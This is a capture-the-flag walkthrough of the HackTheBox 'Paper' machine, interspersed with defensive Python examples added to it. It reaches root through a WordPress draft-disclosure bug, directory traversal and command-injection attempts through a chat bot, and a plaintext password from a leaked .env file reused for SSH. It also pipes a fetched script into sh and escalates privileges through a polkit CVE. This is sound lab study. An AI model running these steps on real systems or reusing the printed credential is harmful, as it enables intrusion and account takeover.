HTB - Paper (Writeup)

by brydr

Paper is a fairly straightforward, easy box created by @secnigma. In this writeup, I will show you how to crack it and gain root privileges.

  • OS: Linux
  • Difficulty: Easy

Reconnaissance

Rustscan

First, we will be checking for open ports. I will be using rustscan here (because it's fast, and it's basically the Rust implementation of nmap), but you are free to choose whatever port scanner you like.

Just put the IP of your HTB instance in the designated placeholders. In my case, it's 10.10.11.143.

rustscan --range 0-65535 -a <ip_of_your_htb_instance>


Rustscan Result

We found that ports 22, 80, and 443 are open.

Let's check them out on nmap:

Nmap

nmap -A -p 22,80,443 <ip_of_your_htb_instance> --script vuln -T4 -vvv
  • SSH
    Nmap - SSH

  • HTTP
    Nmap - HTTP

  • HTTPS
    Nmap - HTTPS

Nikto

The results were not satisfactory. Let's try another tool. Maybe nikto will find something more interesting.

nikto -host <ip_of_your_htb_instance>

Take a look at the header 'x-backend-server'.
Nikto scan result

Maybe we can use that as a hostname for the IP of our target. So, open your favorite text editor and edit your hosts file by adding:

<ip_of_your_htb_instance>     office.paper
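As an added example (not part of the original writeup), here is a small Python audit of the kind of header disclosure nikto flagged: it parses a raw HTTP response, lists headers that leak internal names or software, and builds the hosts-file line from the X-Backend-Server value. The sample response is constructed; only the X-Backend-Server value mirrors the finding above, and the other header values are made up.

```python
import re

# Constructed sample response. The X-Backend-Server value mirrors the
# nikto finding; every other value here is made up for the example.
SAMPLE_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache\r\n"
    "X-Backend-Server: office.paper\r\n"
    "X-Powered-By: PHP\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Headers that commonly reveal internal names or software details.
DISCLOSURE_HEADERS = {
    "x-backend-server": "reveals an internal/virtual hostname",
    "server": "reveals the web server software",
    "x-powered-by": "reveals the application platform",
}

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]+$")


def parse_headers(raw):
    """Split a raw HTTP response into a dict keyed by lowercase header name."""
    head, _, _body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def disclosure_findings(headers):
    """Return (header, value, reason) for every disclosure header present."""
    return [(name, headers[name], reason)
            for name, reason in DISCLOSURE_HEADERS.items() if name in headers]


def hosts_entry(ip, headers):
    """Build the hosts-file line from a leaked X-Backend-Server name, if any."""
    name = headers.get("x-backend-server")
    if not name or not HOSTNAME_RE.match(name):
        return None
    return f"{ip}\t{name}"


if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_RESPONSE)
    for name, value, reason in disclosure_findings(hdrs):
        print(f"{name}: {value}  ({reason})")
    print(hosts_entry("10.10.11.143", hdrs))
```

Run against your own servers' responses, the same function tells you whether a virtual-host name is leaking in a header, which is the fix-side view of what the scan exposed here.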

Nmap

Let's try scanning again, but now using office.paper instead of the target's IP.

nmap -A -p 22,80,443 office.paper --script vuln -T4 -vvv

Running the command above gives us a different result on port 80 (HTTP):

Nmap Scan with Hostname

Our Nmap scan also gave us a list of the users found. Let's take note of that.

WPScan

The website is running WordPress, so we are going to use WPScan. Before that, make sure you have already acquired an API token, or you will not be able to make full use of the scanner. You can get your own API token by signing up on their website.

WPScan Banner

wpscan is normally included in default Kali installations, but in case it is not installed on your VM, run sudo apt update && sudo apt install wpscan -y in your terminal.

Once you have acquired your API token, go to your terminal and type this:

export WPSCAN_TOKEN='<your_wpscan_api_token>'

After that, run wpscan on your terminal:

wpscan --url office.paper --api-token $WPSCAN_TOKEN

While the scan is running, let's explore the website a little bit.

Office.paper Homepage

In one of the posts, there is an interesting comment made by a user named Nick. Take note of that.

Initial Foothold

Let's return to our wpscan and check what we got:

WPScan Result

As we can see, wpscan detected a lot of vulnerabilities. We are not an authenticated user, so we have to look for ways to enter the website and gain a foothold.

Among the results, there is an interesting finding regarding a bug that allows an unauthenticated user to view draft posts. Remember the comment made by Nick that we saw earlier about the secret content in the drafts? Maybe we can use that to gain an initial foothold.

WPScan Result 2

In one of the links included in the vulnerability scan result, Sebastian Neef provides an excellent proof of concept of the said bug.

According to the blog, adding certain query parameters to the base URL will show the hidden content. Let's check it out using these query params:
http://office.paper/?static=1&orderBy=asc&m=YYYYMMDD
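From the defender's side, this is the request pattern to watch for in web server logs. The following Python snippet is an added example, not code from the original writeup or from Sebastian Neef's post: it parses combined-format access log lines (constructed samples) and flags requests that carry the static=1 parameter used to surface drafts, together with whatever other parameters accompany it.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access log format (referer/agent fields ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines. The query strings copy the parameters the
# writeup uses to reveal drafts; the IPs and timestamps are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Feb/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 5123
10.10.14.5 - - [10/Feb/2022:10:01:09 +0000] "GET /?static=1&orderBy=asc&m=20220101 HTTP/1.1" 200 2210
10.10.14.5 - - [10/Feb/2022:10:01:15 +0000] "GET /?static=1 HTTP/1.1" 200 2210
10.10.14.9 - - [10/Feb/2022:10:02:30 +0000] "GET /?p=12 HTTP/1.1" 200 4000
10.10.14.9 - - [10/Feb/2022:10:02:31 +0000] "GET /wp-login.php HTTP/1.1" 200 1500
"""


def parse_line(line):
    """Return a dict for one log line (with the query string parsed), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = parse_qs(urlsplit(rec["target"]).query)
    return rec


def is_draft_probe(query):
    """True when the request carries the static=1 trick used to surface drafts."""
    return query.get("static") == ["1"]


def find_draft_probes(log_text):
    """Return (client_ip, request_target, other_params) for each matching line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_draft_probe(rec["query"]):
            extra = sorted(k for k in rec["query"] if k != "static")
            hits.append((rec["ip"], rec["target"], extra))
    return hits


if __name__ == "__main__":
    for ip, target, extra in find_draft_probes(SAMPLE_LOG):
        print(f"{ip} requested {target} (extra params: {extra})")
```

The rule keys only on static=1, because that is the parameter that makes WordPress hand back unpublished content; the orderBy and m values just control which draft appears. Detection is a stop-gap: the fix is updating WordPress to a version without this bug.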

Secret Link

We are able to view the supposedly hidden draft, and there is a seemingly interesting private link included. Going to the link right away leads us nowhere. We need to add it to our hosts file first, just like we did earlier.

Hosts file configuration

Upon reaching the Rocket.Chat sign-up page, we try to register an account in their private chat system.

Rocket Chat

A successful registration leads us to "general", the main channel in the chat system. Here we can see the conversations of different users, including their developer, Dwight.

Dwight has apparently created a chat bot named Recyclops in the chat system. The bot responds to a set of commands. Let's take a closer look at what this bot can do.

Bot Help 1

Bot Help 2

These are some of the commands the bot accepts:

  1. Show the help menu:

    recyclops help

  2. List files in a directory:

    recyclops list <directory_name>

  3. Get the file and print its contents:

    recyclops file <file_location>

There are some limitations on our user account in the chat system. We cannot reply in the "general" channel. The bot's help menu says the file and list commands are limited to the "sales" folder. This means we are not supposed to have access to the other files on the server. Or so we thought.

So we have a command that accepts a path. Maybe we can try a directory traversal attack. But how can we do that if we can't even reply in the channel? Let's try sending a direct message to some users.

DM 1

DM 2

Why don't we try sending a direct message to Recyclops itself?

Sending the command recyclops list . resulted in this:

DM 3

Notice the dot in the previous list command. Doing some directory traversal with recyclops list ./../ results in this:

Directory Traversal 1

Directory Traversal 2

Remember the OS that was detected in our nmap and nikto scans? It was CentOS, right? Well, the result above looks like a home directory on Linux. The user.txt flag is actually already there. Let's try printing its value.

recyclops file ./../user.txt

Access denied

We got an "Access denied" response. That's because we do not own the file.
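The bot's underlying problem is that it joins the user-supplied path onto its sales folder without checking where the result ends up. The Python below is an added example (not the Hubot script from the box): it shows the naive join next to a confined version that normalises the path and refuses anything outside the base, and it accepts only plain path characters as the argument. The SALES_ROOT path is an assumption about the box's layout, and handle_command is a hypothetical stand-in for the bot's command parser.

```python
import posixpath
import re

# Assumed layout: the bot serves files from a "sales" directory inside its
# owner's home, which is why ./../ lands in the home directory.
SALES_ROOT = "/home/dwight/sales"

# Only plain path characters are accepted for the argument; spaces and shell
# metacharacters (&&, ;, |, $) are rejected up front instead of filtered later.
ARG_RE = re.compile(r"^[A-Za-z0-9._/-]+$")


def vulnerable_resolve(base, user_path):
    """Naive join: ./../ simply walks out of the base directory."""
    return posixpath.normpath(posixpath.join(base, user_path))


def safe_resolve(base, user_path):
    """Join, normalise, then refuse any result that is not inside base."""
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    # The trailing "/" matters: "/home/dwight/sales_old" must not pass.
    if candidate != base and not candidate.startswith(base + "/"):
        raise PermissionError(f"{user_path!r} escapes {base}")
    return candidate


def handle_command(text):
    """Parse 'recyclops <help|list|file> [path]' and return (status, detail)."""
    parts = text.split(None, 2)  # keep the rest of the line as one argument
    if len(parts) == 2 and parts[:2] == ["recyclops", "help"]:
        return ("ok", "help")
    if len(parts) != 3 or parts[0] != "recyclops" or parts[1] not in ("list", "file"):
        return ("error", "usage: recyclops <list|file> <path>")
    arg = parts[2]
    if not ARG_RE.match(arg):
        return ("denied", "invalid characters in path")
    try:
        return ("ok", safe_resolve(SALES_ROOT, arg))
    except PermissionError as exc:
        return ("denied", str(exc))


if __name__ == "__main__":
    print("naive:", vulnerable_resolve(SALES_ROOT, "./../user.txt"))
    for cmd in ("recyclops list .", "recyclops file ./../user.txt",
                "recyclops list ./../ && cat user.txt", "recyclops file /etc/passwd"):
        print(cmd, "->", handle_command(cmd))
```

posixpath.normpath works on strings only, which keeps this check deterministic; on a real filesystem, also resolve the joined path with os.path.realpath so that a symlink inside the sales folder cannot point back out of it.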

How about appending some other OS commands?

recyclops list ./../ && cat user.txt

OS Commands Not Allowed

Denied again. Hmm. Maybe we need to enumerate some more. Using the same command that we used to view the home directory, let's check the other files and directories.

recyclops list ./../

Directory Traversal 3

The folder named hubot seems interesting. We should take a look inside it.

recyclops list ./../hubot

Directory Traversal 4

From here, we could check package.json for vulnerable dependencies in this Node.js app. But there is a juicier file present in this directory. Let's take a look at the .env file.

export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1

See the values for ROCKETCHAT_USER and ROCKETCHAT_PASSWORD? These are the credentials for Recyclops, so we should try logging in with them. Let's log out and use the bot's credentials.

Bot Login Not Allowed

Oops. We kind of hit a wall there. Let's think of other ways to pwn this server.

Maybe we could try some credential stuffing/password spraying?

Remember the owner of the files that we saw when we did our directory traversal? That was Dwight, right? So let's try using his username and the password that we found on the .env file of hubot. Let's SSH into the server:

ssh dwight@10.10.11.143

Enter the password upon prompt.

SSH Login

It worked!

From here, we could simply print the user.txt flag and submit it. I'll leave that to you as an exercise.
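The .env file was the turning point of this box: a dotenv file readable through the bot, a password inside it, and that password reused for a human account. The Python below is an added example (not code from the box) that parses dotenv syntax, reports keys whose names suggest secrets, and flags a file mode that lets other users read the file. The sample content copies the key names from the .env above but uses a placeholder instead of the real password.

```python
import re
import stat

# Constructed .env mirroring the key names found on the box; the password
# value is a placeholder, not the real one.
SAMPLE_ENV = """\
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=REPLACE_ME_placeholder
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export PORT=8000
"""

# Key names that usually carry credentials.
SECRET_KEY_RE = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE)", re.I)
# dotenv line: optional "export", KEY=VALUE.
LINE_RE = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")


def parse_dotenv(text):
    """Parse KEY=VALUE / export KEY=VALUE lines, stripping matching quotes."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]
        env[key] = value
    return env


def secret_keys(env):
    """Keys whose names indicate they hold a credential."""
    return sorted(k for k in env if SECRET_KEY_RE.search(k))


def env_findings(text, mode):
    """Secret-bearing keys plus a warning if group/others can read the file."""
    findings = [f"secret in {k}" for k in secret_keys(parse_dotenv(text))]
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("file readable by group/others (want 0600)")
    return findings


if __name__ == "__main__":
    # Mode 0o644 stands in for what os.stat(path).st_mode & 0o777 would return.
    for finding in env_findings(SAMPLE_ENV, 0o644):
        print(finding)
```

On a live host, feed it the file contents and os.stat(path).st_mode; in this box both checks would have fired, and the bot process could read the file anyway, which is why bot credentials must never be shared with a human account.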

Privilege Escalation

Now, we need to get the flag for root. For that, we need to do some privilege escalation.

My go-to tool for Linux privilege escalation is LinPEAS. LinPEAS provides suggestions on how you could escalate your privileges to root.

Let's first check whether cURL is installed on the target server; otherwise we will have to transfer the LinPEAS script there manually, make it executable (chmod +x) and run it.

which curl

cURL Check

Good. cURL is installed on the server. Now, all we need to do is copy and paste the command as described in the GitHub repo.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

If the command above doesn't work for you, we will have to download LinPEAS on our attack machine first, then transfer it using Python's HTTP server.

Go to the releases page of LinPEAS and download linpeas.sh. After that, we need to set up an HTTP server using Python. The following commands show the two ways to set it up:

Python 2

python -m SimpleHTTPServer <port_number>

Python 3

python3 -m http.server <port_number>

Make sure that the LinPEAS script is in the directory where you started your HTTP server.

Since I have Python 3 installed on my Kali VM, I will use python3 -m http.server 7000, with 7000 as my port.

After that, check the IP address of your attack machine using ip a. Look for the tun0 interface. (Most of the time it is named tun0, but if you have other VPN connections yours might be named differently.) Copy the IP address shown for that interface, excluding the subnet suffix (e.g. /23).

IP Address

Go back to the SSH session we logged in to earlier. Navigate to the /tmp folder using cd. Type the following command:

curl http://<your_attack_machine_ip_address>:<port_number_on_your_http_server>/linpeas.sh --output linpeas.sh

LinPEAS File Transfer Using Python 3 HTTP Server

Use chmod +x ./linpeas.sh so that we can run the script.
LinPEAS chmod +x

Let's run LinPEAS!

./linpeas.sh

This will take a while.

If we take a look at the legend, there are different colors, which indicate how likely a finding is to lead to privilege escalation. What we are interested in are the findings highlighted in RED/YELLOW. Let's take a look at the result:

CVE-2021-3560

It says that the server is vulnerable to CVE-2021-3560. This is a flaw in polkit (PolicyKit) that allows a local attacker to create a new administrator account. Let's look for public exploits.

CVE-2021-3560 PoC

@secnigma has actually written a PoC (proof of concept) for this. Let's copy the contents and paste them into a file on the server using vim.

If you do not know how to use vim, I'll leave learning it to you as an exercise.

vim poc.sh

poc.sh

Tip: In the poc.sh script, you can change the username and password of the account that will be created when you run the script. By default, the username is secnigma and the password is secnigmaftw.

Change Username and Password

Exit vim, and make poc.sh executable with chmod +x poc.sh. After that, run the script using ./poc.sh.

chmod poc.sh

I've set my username as brydr and the password as strongPasswordWow. If the PoC execution was successful, it would look like this:

PoC Success

From there, switch to the user you created with the polkit exploit PoC, then run sudo bash.
I'll leave it to you to work out how to get the root flag, which is stored in root.txt.
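What the PoC leaves behind is a new local account in an administrator group, which is exactly what a host-integrity check should catch. The Python below is an added example (neither the PoC nor LinPEAS): it diffs a baseline /etc/passwd and /etc/group against a later snapshot and reports new users, new members of wheel or sudo (including users whose primary group is one of those), and any extra UID-0 accounts. The snapshots are constructed, with brydr as the account this writeup creates and the other names made up.

```python
# Constructed baseline snapshots (before the PoC) and current snapshots
# (after). Only root and the names used in the writeup are real-looking;
# the UIDs, paths and the rocketchat entry are made up.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
dwight:x:1004:1004::/home/dwight:/bin/bash
rocketchat:x:1001:1001::/opt/rocketchat:/sbin/nologin
"""
BASELINE_GROUP = """\
root:x:0:
wheel:x:10:
dwight:x:1004:
"""
CURRENT_PASSWD = BASELINE_PASSWD + "brydr:x:1005:1005:brydr:/home/brydr:/bin/bash\n"
CURRENT_GROUP = """\
root:x:0:
wheel:x:10:brydr
dwight:x:1004:
brydr:x:1005:
"""

# wheel on CentOS/RHEL, sudo on Debian-family systems.
ADMIN_GROUPS = ("wheel", "sudo")


def parse_passwd(text):
    """Map user name -> uid/gid/home/shell from /etc/passwd content."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_group(text):
    """Map group name -> gid and member set from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":")
        groups[name] = {"gid": int(gid), "members": {m for m in members.split(",") if m}}
    return groups


def admin_members(groups, users):
    """Users in an admin group, either listed as members or via primary gid."""
    admins, admin_gids = set(), set()
    for g in ADMIN_GROUPS:
        if g in groups:
            admins |= groups[g]["members"]
            admin_gids.add(groups[g]["gid"])
    admins |= {n for n, u in users.items() if u["gid"] in admin_gids}
    return admins


def account_changes(base_passwd, base_group, cur_passwd, cur_group):
    """Diff two snapshots and report what a polkit-style account creation leaves behind."""
    base_users, cur_users = parse_passwd(base_passwd), parse_passwd(cur_passwd)
    base_admins = admin_members(parse_group(base_group), base_users)
    cur_admins = admin_members(parse_group(cur_group), cur_users)
    return {
        "new_users": sorted(set(cur_users) - set(base_users)),
        "new_admins": sorted(cur_admins - base_admins),
        "extra_uid0": sorted(n for n, u in cur_users.items() if u["uid"] == 0 and n != "root"),
    }


if __name__ == "__main__":
    print(account_changes(BASELINE_PASSWD, BASELINE_GROUP, CURRENT_PASSWD, CURRENT_GROUP))
```

A real deployment would read the live files and a stored baseline, and would also watch /etc/sudoers and /etc/sudoers.d, since administrator rights can be granted there without touching group membership; the unpatched polkit itself is found by your package manager's update check.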

Thanks for reading my writeup. Happy hacking!
